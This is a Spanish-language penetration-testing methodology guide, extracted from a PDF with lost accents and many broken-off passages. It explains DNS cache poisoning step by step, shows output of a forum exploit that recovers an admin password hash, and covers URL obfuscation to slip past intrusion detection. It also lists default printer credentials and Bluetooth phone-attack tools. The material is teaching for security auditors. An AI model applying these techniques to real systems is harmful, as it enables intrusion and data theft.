Junto con sus libreras grficas, Maltego, te permite identificar relaciones clave entre la informacin
e identificar previamente relaciones entre ella.
A continuacin muestro una captura de pantalla(Figura 1: ):
Figura 1:
Algo interesante para aadir en esta seccin, es algo que parece estar extendindose en fama en
estos das, el Google hacking.
El Google hacking consiste en utilizar la potencia de almacenamiento y bsqueda de algunos
motores de bsqueda (en este caso, de Google), para buscar informacin sensible, o que no debera
ser pblica, en las bases de datos del buscador. stas, se realizan mediante la utilizacin de palabras
clave o sentencias especficas, y suelen ser de gran ayuda para el auditor.
En su formato malicioso, puede ser utilizado para detectar servidores web (o pginas web) que sean
vulnerables a ciertas vulnerabilidades, o fallos de seguridad. Tambin, sirven para buscar
Pgina 25
2. Revisin de la privacidad
La revisin de la privacidad, se encarga de las partes ticas y legales referentes al almacenaje,
transmisin y control de datos de empleados y clientes. Se encarga de que se cumplan los derechos
de las personas dentro de una empresa, para que sus datos personales no queden al descubierto de
todo el mundo. Se refiere tambin, a como se distribuyen las contraseas. No es lo mismo
transmitirlas mediante palabra, que por escrito, va mail etc... Esto puede ser muy comprometedor
tanto para la empresa como para la persona afectada. Es comn, encontrar muchas contraseas
escritas en, por ejemplo, post-its pegados en el borde del monitor del puesto de trabajo.
A pesar de que muchas leyes son locales, todas se aplican a Internet, y por tanto, afectan a los
security testers internacionalmente. Es necesario pues, tener un conocimiento bsico de estas leyes,
y las medidas necesarias para que la empresa pueda cumplirlas.
En lo que se refiere a Espaa, las leyes mas famosas que guardan relacin con la privacidad, son la
Ley Orgnica de Proteccin de Datos (LOPD) y la Ley de Servicios de la Sociedad de la
Informacin (LSSI o LSSICE). No entraremos en detalles sobre estas leyes, pero bsicamente se
refieren a:
LOPD: objetivo principal es regular el tratamiento de los datos y ficheros, de carcter personal,
independientemente del soporte en el cual sean tratados, los derechos de los ciudadanos sobre ellos
y las obligaciones de aquellos que los crean o tratan .
LSSI:
Las obligaciones de los prestadores de servicios incluidos los que acten como intermediarios en la
transmisin de contenidos por las redes de telecomunicaciones .
Las comunicaciones comerciales por va electrnica.
La informacin previa y posterior a la celebracin de contratos electrnicos.
Las condiciones relativas a su validez y eficacia.
El rgimen sancionador aplicable a los prestadores de servicios de la sociedad de la informacin.
3. Recoleccin de documentos
Esta seccin, guarda cierta relacin con el punto uno de esta seccin (Revisin de inteligencia
competitiva), aunque esta se centra ms, en aspectos ms pequeos y concretos, como emails,
ofertas de trabajo etc... que se pueden extraer de la informacin o metadatos que incluyen los
documentos. Una herramienta interesante para realizar esto, podra ser FOCA(Figura 2: ). Se trata
de un programa para la descarga de ficheros ofimticos de pginas web, extraer informacin oculta,
metadatos, y datos perdidos. Tambin puede cruzar la informacin obtenida e intentar conseguir el
mapa de la red estudiada. Se cre para la gira Up To Secure y Blackhat Europe 2009.
Pgina 26
Figura 2:
Dispone tambin de una versin online(Figura 3: ), que puede ser muy til para realizar esta seccin
de forma rpida, y desde cualquier lugar que disponga de conexin a Internet.
Figura 3:
cualquier internauta, cuando recibe el llamado phishing de alguna entidad, que pide el nmero de
tarjeta de crdito para realizar cualquier comprobacin.
Esto, que parece tan simple, como es el hacerse pasar por alguien, es curiosamente un mtodo que
suele resultar bastante eficaz, y mucho menos costoso que la bsqueda de fallos informticos. De
hecho, es conocido por la web, que en una empresa llamada Boixnet, se hizo una encuesta, donde el
90% de los empleados de oficina de la estacin de Waterloo, revel sus contraseas a cambio de un
bolgrafo barato. No se hasta que punto ser cierto esto, ya que no he sido capaz de contrastarlo con
fuentes fiables, pero al menos nos deja ver, la importancia que toma en la red, el concepto de
ingeniera social. Adems, encontrar ejemplos reales de ataques de ingeniera social suele ser
difcil, ya que las organizaciones que lo han sufrido no quieren admitirlo, o no ha sido documentado
formalmente, o quizs ni siquiera se dieron cuenta de que lo han sufrido. No obstante, existen un
par de ejemplos extrados del International Secutity Institute:
Te llaman a medianoche:
Ha
No
Bueno,
Pgina 29
Figura 4:
De este paquete, nos interesan especialmente los siguientes campos:
Source/Destination IP address: son las direcciones origen y destino respectivamente.
Source/Destination ports: puertos origen y destino respectivamente. El puerto destino del
primer paquete ser siempre 53/UDP, ya que los servidores DNS, escuchan en este puerto
normalmente.
Query ID: identificacin de peticin. Sirve para que, los servidores puedan emparejar las
respuestas con las peticiones recibidas, ya que un servidor suele recibir muchas peticiones
simultneamente.
RD(Recursion Desired): sirve para indicar si se desea recursin (se marca con un 1), o no
(se marca con un 0) para las consultas DNS. No todos los servidores de nombres ofrecern
recursin.
Answer/authority/additional record count: sirven para indicar distintos tipos de respuesta
para la peticin que efectu el cliente.
DNS Question/Answer data : este campo contiene los datos de la pregunta/respuesta de los
campos anteriores. Por ejemplo, la tupla nombre de dominio IP.
Una vez conocidos estos campos, podemos explicar como funciona el fallo de DNS, o ms
correctamente, el envenenamiento de cach (cache poisoning).
El envenenamiento de cache de DNS no es tan sencillo como simplemente enviar paquetes
aleatorios al servidor de nombres (al contrario que otros envenenamientos, como ARP), ya que el
servidor de nombres slo acepta respuestas de peticiones que an tiene pendientes.
Como sabe un servidor de nombres que espera un determinado paquete?
El paquete llega al mismo puerto UDP desde el que se envi.
La seccin pregunta/respuesta (que est duplicada en la respuesta del paquete), coincide con la
pregunta/respuesta de la peticin pendiente.
La Query ID coincide con la peticin pendiente.
Pgina 30
Que
las secciones de Authority y Additional contienen nombres que se encuentran dentro del
mismo dominio que la pregunta. Esto se conoce como "bailiwick checking".
Si se satisfacen todas estas condiciones, el servidor de nombres aceptar la respuesta como vlida, y
almacenar en su cach la nueva tupla nombre de dominio IP.
Ahora bien, como conseguimos que se den todas estas condiciones?
El fallo, surge del hecho de que es fcil adivinar el Query ID, ya que en los antiguos servidores de
nombres, el Query ID simplemente aumenta en uno en cada peticin que enva, y esto hace que sea
fcil de saber cual ser el siguiente mientras podamos conocer alguna peticin.
Figura 5:
Podemos provocar al servidor de nombres que nos diga su Query ID, tal y como se expone(Figura
5: ):
1.El usuario malintencionado (bad guy en el diagrama) pregunta al servidor de nombres vctima por
un nombre en una zona para un servidor de nombres que l controla (en el ejemplo,
test.badguy.com). Podra tambin preguntar al servidor directamente, si permite recursin desde
donde se encuentra el usuario malintencionado, o tambin convencer a un usuario para que busque
un nombre, por ejemplo, incluyendo el nombre del test en una pgina web.
2.El servidor de nombres vctima recibe la peticin y opera como lo hara normalmente, intentando
resolver el nombre de dominio en los servidores raz.
3.La direccin test.badguy.com se resuelve en el servidor del usuario malintencionado (puesto que
es suyo.
4.Mientras tanto, el usuario malintencionado ha estado monitorizando el trfico IP que pasa por su
mquina, y as captura la Query ID utilizada.
En este punto, ya tenemos la Query ID, aunque en realidad no hemos envenenado la cach, ya que
la direccin test.badguy.com era realmente lcita y perteneciente al usuario malintencionado. Pero,
Pgina 31
ahora, ya conocemos como podemos predecir el Query ID, adems de otros datos como el puerto
UDP, ver los servidores de nombres que se han ido consultando etc. Ahora, veamos como
finalmente podemos utilizar esto para finalmente envenenar la cach (Figura 6: ):
Figura 6:
Paso
1: El usuario malintencionado enva una peticin DNS al servidor de nombres vctima del
hostname que quiere falsificar (www.bankofsteve.com). En el ejemplo, se asume que el servidor
de nombres vctima permite peticiones recursivas desde la zona del atacante.
Paso 2a: Sabiendo que la vctima est a punto de hacer una consulta de una direccin IP a
ns1.bankofsteve.com(redirigido desde los servidores raz), el atacante empieza a lanzar mltiples
peticiones a la vctima con paquetes DNS de respuesta, simulando que provienen de
ns1.bankofsteve.com (servidores globales), con el nombre del dominio a secuestrar, y la IP del
servidor web del atacante.
Pasos 2b y 3: La consulta DNS se realiza normalmente, respondiendo a la vctima que consulte el
servidor ns1.bankofsteve.com.
Paso 4: el servidor de nombres vctima pregunta a ns1.bankofsteve.com por la direccin IP de
www.bankofsteve.com, y utiliza el Query ID 1001 (uno mas que la Query anterior).
Paso 5: El servidor de nombres real responde a la Query con Query ID?1001. Pero, como el
atacante ha estado enviando muchas respuestas en el paso 2a, la respuesta legal llega demasiado
tarde, por lo que se descarta.
Pgina 32
Paso
6: Ahora, en la cach del servidor de nombres vctima est la direccin fraudulenta, y a partir
de ahora, siempre que se le consulte, responder con la direccin IP del atacante.
Porqu ha sucedido esto? El problema, es que se acepta la primera respuesta correcta, aunque haya
recibido muchas incorrectas, y contine recibiendo correctas despus.
Cabe destacar unas cuantas cuestiones sobre el tema:
El nombre NO DEBE estar en la cach antes del ataque. Si la direccin estuviera ya en la cach, no
se efectuaran consultas, por lo que hay que esperar a que caduque en la cach, y luego intentar el
ataque.
El atacante, debe adivinar la Query ID, pero como vemos, esto es posible, ya que solo se
incrementa en 1 cada vez, por lo que el rango de pruebas suele ser pequeo an en servidores con
muchas peticiones.
Por ltimo, hay que destacar, que la vctima debe recibir la respuesta correcta del atacante ANTES
de que se reciba la respuesta legal, por lo que debe de estar ms prximo a l que el lcito (cercano
en cuanto a tiempo), sino, llegar tarde, y se descartar.
Este problema del DNS se ha conseguido solucionar, utilizando mtodos para que sea ms difcil
adivinar la respuesta del Query ID, y ha habido que parchear una gran cantidad de servidores a lo
largo de la web. Desde luego, el descubrimiento de esta brecha de seguridad dio mucho que hablar
en 2008, aunque parece que ya est solucionado.
toda la informacin posible, que ya filtraremos ms tarde. Es mejor que nos sobre que el que nos
falte.
Qu podemos hacer para conseguirlo? Existen muchas posibilidades, entre las que se destacan:
WHOIS
DNS Zone Transfer
WHOIS es un protocolo que est ampliamente extendido para consultar una base de datos oficial
para determinar el propietario de un nombre de dominio, direccin IP etc... Tradicionalmente, se
ejecutaba por lnea de comandos (en linux mediante el comando whois), aunque ahora existen webs
que lo ejecutan(Figura 7: ):
Figura 7:
En la imagen anterior, introducimos Google, para que nos muestre informacin sobre el dominio. A
continuacin se muestra un extracto de la informacin que nos devuelve la pgina web:
Registrant:
Dns Admin
Google Inc.
Please contact contact-admin@Google.com 1600 Amphitheatre
Parkway
Mountain View CA 94043
US
dns-admin@Google.com +1.6502530000 Fax: +1.6506188571
Domain Name: Google.com
Registrar Name: Markmonitor.com
Registrar Whois: whois.markmonitor.com
Registrar Homepage: http://www.markmonitor.com
Administrative Contact:
DNS Admin
Google Inc.
1600 Amphitheatre Parkway
Mountain View CA 94043
US
dns-admin@Google.com +1.6506234000 Fax: +1.6506188571
Technical Contact, Zone Contact:
DNS Admin
Pgina 35
Google Inc.
2400 E. Bayshore Pkwy
Mountain View CA 94043
US
dns-admin@Google.com +1.6503300100 Fax: +1.6506181499
Created on..............: 1997-09-15.
Expires on..............: 2011-09-13.
Record last updated on..: 2008-06-08.
Domain servers in listed order:
ns4.Google.com
ns3.Google.com
ns2.Google.com
ns1.Google.com
Como vemos, encontramos informacin tanto del registro, como algunos servidores de dominio.
Las DNS zone transfer, normalmente son utilizadas para replicar datos DNS a entre distintos
servidores DNS, o para hacer copias de seguridad de los mismos. Un usuario o servidor realizar
una peticin de transferencia de zona de un servidor de nombres especifico. Si el servidor o permite,
todos los nombres DNS y direcciones IP alojadas en el mismo servidor de nombres sern
transferidas en ASCII, por lo tanto, ser ideal para nuestros propsito.
en linux, el comando host:
$
>
>
>
>
>
>
>
>
host -l rutgers.edu
Rutgers.EDU name server dns1.Rutgers.EDU
Rutgers.EDU name server dns2.Rutgers.EDU
Rutgers.EDU name server dns3.Rutgers.EDU
Rutgers.EDU name server turtle.mcc.com
Rutgers.EDU has address 165.230.4.76
grad03.Rutgers.EDU has address 128.6.20.29
dgcacook4.Rutgers.EDU has address 128.6.87.158
grad04.Rutgers.EDU has address 128.6.20.30
2. Escaneo de Puertos
Aqu comienza la primera parte del test intrusivo. En este mdulo, se intenta comprobar qu
servicios estn activos actualmente, a la escucha de que un cliente se conecte a ellos.
El escaneo de puertos se sondea los puertos del sistema en el nivel de transporte y de red, y se
comprueba tambin si el firewall est correctamente configurado.
Todo sistema conectado a la red, tiene 65536 puertos (incluyendo el puerto 0). Sin embargo, no
hace falta comprobarlos todos siempre. El seleccionar qu puertos comprobar lo deciden el propio
equipo de la auditora. Adems de comprobar los puertos ms importantes, si que se recomienda
escanear por puertos poco comunes de vez en cuando, pues es una forma comn de detectar
servicios conectados pero no deseables, por ejemplo algn troyano que est a la escucha.
NMAP es el escner de puertos por excelencia, y se hablar de l y su forma de funcionar en el
ejemplo de test de penetracin del presente texto.
3. Identificacin de Servicios
En este mdulo, se comprueba los resultados obtenidos del escaneo de puertos. Muchas veces, es
posible que los escneres de puertos obtengan resultados errneos, que sea otro servicio el que est
a la escucha (por ejemplo, un troyano a la escucha en un puerto conocido, como por ejemplo 53,
que generalmente est asociado a DNS). Es por ello que hay que verificarlo.
Para realizar las comprobaciones, se puede conectar mediante algn programa que enve cadenas de
texto, e intercambiar comandos con aquellos servicios que queremos comprobar. Si responden a los
comandos de forma esperada (se puede comprobar que comandos admite cada protocolo en los
RFC), entonces, ese servicio est a la escucha en el puerto encontrado, y por lo tanto lo hemos
verificado.
Telnet, Netcat son ejemplos de herramientas para comprobarlo, y se hablar de ellas en el ejemplo
de test de penetracin del presente texto.
Pgina 37
=>
www.foroejemplo.com
=> Insert directory
=> es: /forum/ - /phpBB2/
=>
/foros/
=> User ID
=> Number:
=>
1
Exploit in process...
Exploit
in process...
Exploit finished!
MD5-Hash is: 827ccb0eea8a706c4c34a16891f84e7b
Lo que ha sucedido aqu, es que dndole la direccin del foro, la seccin, el ID de un usuario (en
este caso 1, que es el administrador del foro), nos ha recuperado el pass codificado en MD5, el cual
podremos intentar decodificar, por ejemplo, utilizando fuerza bruta, ataque de diccionario, desde la
mquina local, por lo que tenemos todo el tiempo del mundo para hacerlo, sin necesidad de utilizar
la red, y sin ser intrusivos.
Figura 8:
Pgina 39
En el primer escenario, tenemos una red protegida por un firewall que bloquea todo el trfico
entrante excepto ping y su respuesta (ICMP tipo 8 y 0 respectivamente).
En el primer ejemplo, usamos los paquetes UDP por defecto(Figura 9: ):
Figura 9:
Como vemos, nos lo bloquea. Ahora bien, vamos a intentarlo utilizando ICMP(Figura 10: ):
Figura 10:
Con esto, ya vemos que ya podemos acceder dentro de la red, y recoger datos de ella.
En el segundo escenario, vamos a ver que sucede si el firewall bloquea todo el trfico entrante a
excepcin de UDP puerto 53, es decir, para DNS (Figura 11: ):
Figura 11:
Como podemos ver en la figura (Figura 11: ), el traceroute es bloqueado en el octavo salto porque
no se permite el paso exceptuando peticiones DNS. Sabiendo esto, podemos disear un plan.
Tenemos control sobre:
El puerto con el que empezar traceroute (recordemos, que ir incrementndose)
El numero de sondas por ronda (3 por defecto)
Pgina 41
Adems, tambin conocemos el nmero de saltos entre nosotros y el firewall, por lo que es fcil
deducir:
(53 (8*3)) -1 = 28
Por lo tanto, si nuestro puerto inicial lo especificamos como 28, al llegar al firewall, los paquetes se
enviarn al puerto 53, y nos permitir el paso (Figura 12: ):
Figura 12:
Como vemos, hemos conseguido saltar por encima del objetivo, pero se nos bloquea, ms adelante,
ya que no se nos permite el paso de trfico con puerto distinto a 53, y traceroute incrementa el
puerto. Una posibilidad para sortear esto, sera modificar el cdigo de traceroute para que no
incremente el puerto objetivo, pero esto escapa al alcance del presente documento. De momento,
debemos conformarnos con que sabemos que el trfico dirigido al puerto 53 se nos permite el paso,
y que otros se nos est bloqueando. Adems, conoceremos el siguiente host al firewall.
Ahora comienza el concepto de Firewalking. Para poder utilizar la respuesta de la puerta de acceso
como medio de informacin, debemos saber dos cosas:
La direccin IP de la ltima puerta de acceso antes firewall
La direccin IP del host detrs del firewall.
La primera, nos servir como origen de nuestras mediciones (en trminos de saltos), y la segunda la
utilizaremos como direccin hacia la que enviar el flujo de paquetes. Podremos utilizar una tcnica
conocida como firewall protocol scan, que nos dar a conocer qu puertos/protocolos nos permite el
firewall utilizar para atravesarlo. Para ello, trataremos de probar cada puerto, y esperar las
respuestas. O tambin podemos tratar de enviar paquetes a todos los hosts detrs del firewall, para
intentar hacer un mapa de la topologa de la red.
A partir de aqu, traceroute nos limita mucho, por lo tanto, vamos a presentar una nueva
herramienta: firewalk. Su funcionalidad se basa en lo mencionado. Realizar dos fases, una de
exploracin, y otra de escaneo. Una la har para averiguar el TTL donde est la puerta de acceso, y
otra, para realizar el firewall protocol scan. Un ejemplo de ejecucin (Figura 13: ):
Pgina 42
Figura 13:
9. Testeo de Firewall
Este mdulo es bastante similar al del testeo de router. Las tcnicas aplicadas en el anterior pueden
ser aplicables a ste. Aqu se realiza un estudio ms avanzado de las reglas del firewall, entendiendo
al 100% todas las reglas, y permitiendo solo aquello expresamente necesario. Adems, no solamente
se estudiar el firewall que haya en la puerta de enlace; se estudiarn todos los firewalls que haya en
el sistema estudiado.
en la red, hace saltar una alarma, de tal forma que los administradores del sistema puedan realizar
las acciones pertinentes. Por ejemplo, podra ser una poltica de una empresa el que los usuarios de
la red no deban visitar pginas de pornografa. Por lo tanto, el IDS podra configurarse de tal forma
que, cuando detecte la palabra sexo, pornografa etc... bloquee el acceso.
Con la deteccin de patrones en URL (como en el ejemplo anterior), me resulta interesante
comentar, una tcnica para tratar de evitar que el IDS alerte de un uso fraudulento. Se trata del uso
de obfuscated URLs.
A continuacin, voy a comentar su funcionamiento bsico, de forma que podamos ver cmo puede
burlar un IDS. Debo de advertir, que los ejemplos que voy a exponer a continuacin utiliza IPs hace
mucho que han cambiado, por lo que los ejemplos podran no funcionar.
Que es una obfuscated URL? Una obfuscated URL es una direccin url que hemos traducido (u
ofuscado en nuestro caso) para poder burlar o engaar tanto a un IDS como a un ser humano.
Trataremos de que no se reconozca aquella pgina web, por ejemplo, para usos fraudulentos.
Ejemplo de web sin ofuscar: http://www.pc-help.org/obscure.htm
Misma web ofuscada: http://3468664375@3468664375/o%62s%63ur%65%2e%68t%6D
Como vemos, es difcil de reconocer, y por tanto es altamente probable que pueda pasarse por alto
su contenido real, y probablemente pueda pasar inadvertida ante un IDS que no est debidamente
configurado.
Como ha sido traducida? La parte entre http:// y la @, se suele utilizar para la autenticacin (de la
forma usuario:pass), pero en las direcciones donde no se exige autenticacin, no importa lo que
pongamos, por lo que tanto el navegador como el servidor simplemente lo ignorar. Esto podra
utilizarse para tratar de engaar tambin:
http://www.upv.es@3468664375/obscure.htm
Esta direccin podra hacer creer que la pgina web est en upv.es
La segunda parte, (entre la @ y la primera barra) 3468664375, es la propia direccin IP donde est
hospedada la pgina web, solo que se ha traducido de decimal a dword. Esto hace que sea ms
dificil an de reconocer. La forma de hacerlo, es la siguiente:
206 * 256 + 191 = * 256 + 158 = * 256 + 55 = 3468664375
Por ltimo, nos queda parte entre la primera barra y el final de la url:
/o%62s%63ur%65%2e%68t%6D
Esta parte equivale a: /obscure.htm Lo que hemos realizado aqu, es el traducir algunas letras a
hexadecimal (base 16) de sus cdigos ASCII.
Esto no ha sido mas que un ejemplo. Hay muchas otras formas de realizarlo, desde las ms simples,
a las ms complejas, por lo que es algo interesante a realizar si queremos pasar desapercibido ante
algunos IDS, y algo que debemos revisar en el IDS que estemos comprobando.
Pgina 44
demasiado cortas
Uso de una misma contrasea en varios sitios
Utilizacin de palabras conocidas, existentes en diccionarios
Uso de contraseas comunes (Dios, sol, Ra etc..) que se encuentren tambin en diccionarios
Utilizacin del login como contrasea (login: Paco Pass: Paco)
El tipo de ataque ms comn para aprovecharnos de estos fallos, es el uso de ataques de fuerza
bruta o diccionario, de los cuales se muestra un ejemplo en la parte tcnica del documento.
Para poder mejorar la robustez de nuestras contraseas, se aconseja, evitar los fallos descritos antes,
y adems:
Uso
de maysculas y minsculas
Utilizacin de letras y nmeros
Utilizacin de smbolos y acentos
Cambiar regularmente de contrasea
Si seguimos estos consejos, el proceso se ralentiza considerablemente, hasta el punto de hacer que
no sea til el tiempo invertido para descifrar la contrasea, y se intente entrar al sistema por otros
medios.
Por la parte de fallos del propio algoritmo de compresin, la mayora se basan en fallos de origen
matemtico o puramente criptogrfico, lo cual se escapa de la intencin del documento. No
obstante, se expone un ejemplo que ha sido bastante comentado, el fallo de MD5, que est
documentado en wikipedia :
A pesar de haber sido considerado criptogrficamente seguro en un
principio, ciertas investigaciones han revelado vulnerabilidades
que hacen cuestionable el uso futuro del MD5. En agosto de 2004,
Xiaoyun Wang, Dengguo Feng, Xuejia Lai y Hongbo Yu anunciaron el
descubrimiento de colisiones de hash para MD5. Su ataque se
consum en una hora de clculo con un clster IBM P690.
Pgina 45
Aunque dicho ataque era analtico, el tamao del hash (128 bits)
es lo suficientemente pequeo como para que resulte vulnerable
frente a ataques de fuerza bruta tipo cumpleaos. El proyecto
de computacin distribuida MD5CRK arranc en marzo de 2004 con el
propsito de demostrar que MD5 es inseguro frente a uno de tales
ataques, aunque acab poco despus del aviso de la publicacin de
la vulnerabilidad del equipo de Wang.
Debido al descubrimiento de mtodos sencillos para generar
colisiones de hash, muchos investigadores recomiendan su
sustitucin por algoritmos alternativos tales como SHA-1 o
RIPEMD-160.
Pgina 47
Figura 14:
Existen muchas razones por las que se debera realizar una revisin concienzuda en este mdulo:
Los PBX y perifricos tienen largos tiempos de vida, por lo que no siempre estn a la ltima.
Siendo as, muchos sern bastante antiguos, por lo que sus dispositivos de seguridad tambin
los son, por lo tanto, los hacen fciles de manipular. Adems, sus bases de datos internas
pueden estar sin codificar, y su estructura fcil de comprender.
Existen pocas empresas que se dediquen a fabricarlas, por lo que conociendo un par,
conoces el 70% del mercado.
La gente que maneja las PBX no suelen estar concienciados de medidas de seguridad, por lo
que muchas veces, hasta las funciones ms obvias de seguridad, muchas veces no estn
presentes.
La mayora de veces estn gestionados remotamente, por lo que es fcil para los hackers
encontrar estos puntos de acceso.
Las actualizaciones de software de los PBX se suelen hacer remotamente, por lo que es
posible interceptarlas y corromperlas, introduciendo caballos de Troya
Pgina 48
El mantenimiento remoto por parte de los proveedores significa que las contraseas y mucha
de la informacin pueden encontrarse fcilmente fuera de la empresa (por ejemplo, estar
disponible en algn manual en alguna pgina web).
Muchas veces es utilizado por todo el mundo, no solamente gente cualificada, por lo que
hace que sea ms susceptible a la ingeniera social (por ejemplo, engaando para que les den
la contrasea).
Suele estar instalado en lugares poco utilizados, como en algn almacn poco transitado, por
lo que hace que sea fcil de acercarse y manipularlo.
Los PBX son extremadamente complicados, por lo que es muy difcil de garantizar la
seguridad de cada caracterstica que ofrece por separado, por lo que es muy posible que un
hacker se prepare a fondo un tipo de penetracin, y superar al encargado, ya que este tiene
una visin ms general del mismo.
El comprometer la PBX significa, que un atacante pueda adems, obtener informacin privilegiada
de la empresa, llamar en su nombre, y un largo etc.
Tambin sucede que, cualquiera puede ver los parmetros de configuracin (direccin IP, nombre
del servidor de correo, etc..), aunque el administrador no permita que los usuarios cambien los
mismos, lo cual, sigue siendo til para el usuario malintencionado. An as, es poco comn que los
encargados de stas mquinas se preocupen de de denegarlo va el navegador web el FTP y telnet
(muchos de los usuarios ni siquiera sabrn que es telnet). Siendo as, cualquiera puede cambiar las
direcciones IP, las mascaras de red, o la puerta de acceso de la impresora para deshabilitarlo, o
incluso crearse una forma de evadir firewalls, por ejemplo.
Otro punto interesante, es la gran capacidad de almacenaje que tienen, pues almacenan todo lo que
se va imprimiendo, escaneando, emails etc...
Por ltimo, comentar algunos ejemplos de fallos encontrados en el modelo de Imagistics DL370:
1.Contiene 3 cuentas administrativas y contraseas. Para consola, navegador web y telnet. La
consola no est activada por defecto. Las 3 cuentas tienen por defecto el login/contrasea como:
adm/adm, aunque cada proveedor es posible que cambie esto antes de instalarlo.
2.Las funciones de administracin requieren una contrasea, aunque una vez introducida la
contrasea se almacena en la URL en texto sin cifrar, y puede ser recuperado fcilmente.
3.Si se guardan los parmetros de configuracin en el disco duro, y abres el fichero .bin con algn
editor de texto, aparece tambin la contrasea del admin, y solo se necesita permiso de usuario para
leerlo.
4.No puede deshabilitarse la funcin del navegador web para la administracin, por lo que los fallos
2 y 3 siempre estarn disponibles.
4. Testeo de Mdems
La tcnica ms importante que se utiliza para comprometer la seguridad de los mdems, es la
conocida como wardialing:
Wardialing fue una tcnica utilizada principalmente en las dcadas de los 80 y 90, cuando los
mdems de marcacin por tonos eran la forma ms comn de conexin a internet. Consista
principalmente en hacer llamadas a una serie de nmeros de telfono automticamente con el fin de
encontrar mdems conectados que permitieran la conexin con algn ordenador. El trmino toma su
nombre de una pelcula llamada Wargames, donde los protagonistas utilizaban una tcnica conocida
hasta entonces como daemon dialing, y la llamaban wardialing. A partir de entonces, pas a
llamarse wardialing, y es la que se emplea actualmente.
Con la llegada de las nuevas tecnologas, unas herramientas quedan desfasadas, y otras aparecen, y
dentro del wardialing, aparece una herramienta novedosa: WarVox(Figura 15: ).
Figura 15:
sta es una herramienta actual que permite, mediante VoIP, realizar una identificacin o
clasificacin de lneas de telfono que expongan servicios a datos.
Pgina 51
Pgina 52
Figura 16:
Con WarVox, podemos introducir una lista (o una serie de rangos) a analizar, para que la
herramienta llame a dichos nmeros por medio de VoIP y nos proporcione una lista reducida de
nmeros interesantes sobre los cuales profundizar en un anlisis ms manual. Esto suele ser
comn en muchas de las formas de trabajar de los auditores, comenzar el anlisis de uno de los
mdulos mediante la automatizacin antes de pasar al modo manual. Y no solo hablando de
herramientas informticas que lo realicen, sino tambin mediante el uso de scripts que hacen que los
propios programas puedan trabajar en los aspectos ms tediosos y largos, y que los propios
auditores puedan dedicar su reducido tiempo a otros aspectos que no es posible automatizar.
Volviendo al tema, a diferencia de las herramientas de wardialing tradicional, WarVox no conecta
al otro extremo e interpreta los datos como seria habitual.. Por el contrario, WarVox lo que hace
es grabar durante un tiempo determinado el sonido que genera el otro extremo tras descolgar, para
ms tarde analizarlo mediante transformaciones de Fourier y otros anlisis matemticos en busca de
indicios de que el sonido corresponde a un mdem, fax u otro servicio de datos.
Una vez recopilados estos nmeros de telfono interesantes, ya se puede utilizar los mdems
tradicionales para marcar e investigar que se esconde tras la portadora remota, tal y como se viene
haciendo en el Wardialing tradicional.
dedican mucho tiempo. Es mejor dedicar el escaso tiempo del que suele disponerse para recorrer el
resto de mdulos de la metodologa.
En este mdulo, lo que se suele explorar, es la radiacin emitida por los distintos dispositivos de los
que dispone una empresa. Existen dispositivos, que son capaces de detectar desde una cierta
distancia, la radiacin que emite una pantalla de ordenador, por ejemplo, y mostrar las imgenes en
otra pantalla. De esta forma, no es necesario tener contacto visual con la pantalla. Tambin es
posible recoger radiacin de impresoras, mdems, telfonos mviles y tratar de mostrar lo que han
recogido, o estn transmitiendo, aunque muchas veces, aparece demasiado ruido como para que
pueda entenderse, o simplemente utilizando coberturas metlicas (en bases militares de EEUU
utilizan equipamiento especialmente diseado contra estas fugas de informacin, catalogados como
Tempest). Tambin es posible reducir las probabilidades de ser detectado, utilizando
configuraciones de pantalla con bajo contraste, o emitir ruido blanco (la tpica niebla de la
televisin es ruido blanco) para que los receptores no sean capaces de distinguirlo de la seal
original.
un tester puede muchas veces introducirse tambin en la red, gracias a las vulnerabilidades
inherentes a la codificacin utilizada. Tanto WEP como WPA (Wi-Fi Protected Access) son
vulnerables a ataques de diccionario offline, con WPA siendo objetivo de cada vez ataques ms
rpidos en el ao pasado.
Como herramientas populares para este campo:
kismet:
Los dispositivos que con mayor intensidad utilizan esta tecnologa pertenecen a sectores de las
telecomunicaciones y la informtica personal, como PDA, telfonos mviles, ordenadores
porttiles, ordenadores personales, impresoras o cmaras digitales.
Este mdulo de la OSSTMM, se encarga principalmente de comprobar las redes conocidas como
piconets :
Una piconet puede constar de dos a ocho dispositivos unidos por Bluetooth. En una piconet, habr
siempre un maestro y los dems sern esclavos.
El perifrico como maestro:
Pgina 55
Se
Establece
conexiones en las que un paquete de datos ocupa una ranura para la emisin y otro para
la recepcin que pueden ser usados alternativamente, dando lugar a un esquema de tipo TDD (Time
Division Duplex).
La
secuencia nica de salto de frecuencia del canal est determinado por la identidad del maestro
de la piconet (un cdigo nico para cada equipo), y por su frecuencia de reloj. Para que una unidad
esclava pueda sincronizarse con una unidad maestra, sta debe aadir un ajuste a su propio reloj
nativo y as poder compartir la misma portadora de salto.
Mucha gente no es consciente de la seguridad en, por ejemplo sus telfonos mviles. Siempre que
piensan en seguridad de las tecnologas de la informacin, piensan nicamente en sus ordenadores
personales, pero dentro de los telfonos, se puede encontrar montones de informacin personal o
confidencial (sobre todo si es el telfono de algn ejecutivo).
Una herramienta interesante, es Super Bluetooth Hack, una herramienta Java para telfonos
Ericsson y Nokia. Entre otras acciones disponibles para realizar contra un telfono remoto, incluye:
Leer
mensajes SMS
Leer contactos
Cambio de perfil
Desempear meloda (incluso si el telfono est en silencio)
Reproducir canciones
Reiniciar el telfono
Apagar el telfono
Restaurar la configuracin de fbrica
Cambio de volumen de timbre
Llamada desde otro telfono
Cabe notar, que se necesita que el telfono remoto nos de permiso para emparejar los telfonos. Sin
embargo, esto puede no ser demasiado dificil utilizando alguna tcnica de ingeniera social.
Existen muchas otras herramientas:
Blooover:
herramienta que funciona sobre telfonos con J2ME habilitado. Es una herramienta de
auditora que puede ser utilizado para comprobar si sus telfonos son vulnerables
BlueBug: BlueBug es el nombre de un agujero de seguridad en algunos telfonos mviles con
Bluetooth. Explotando este agujero, permite descargar agendas de contacto y listas de llamadas
enviando mensajes SMS al telfono atacado entre otras cosas.
BlueFish: es un sistema de vigilancia que busca la presencia de dispositivos Bluetooth y sus
usuarios. BlueFish escanea constantemente en busca de dispositivos con Bluetooth activado.
Cuando encuentra un nuevo dispositivo, el programa saca una captura del rea donde fue localizado
el dispositivo, y cataloga toda la informacin disponible del dispositivo. Si vuelve a encontrar
alguna vez ese mismo dispositivo, se le enviar la ltima imagen capturada del mismo mediante
Bluetooth. Todas las imgenes son marcadas con el nombre del dispositivo y la hora cuando fue
observado por ltima vez. Segn va pasando el tiempo, se construye un perfil de cada dispositivo,
de forma que es posible hacerse una idea de las costumbres de la persona que frecuenta el lugar.
Pgina 56
Bluetooth
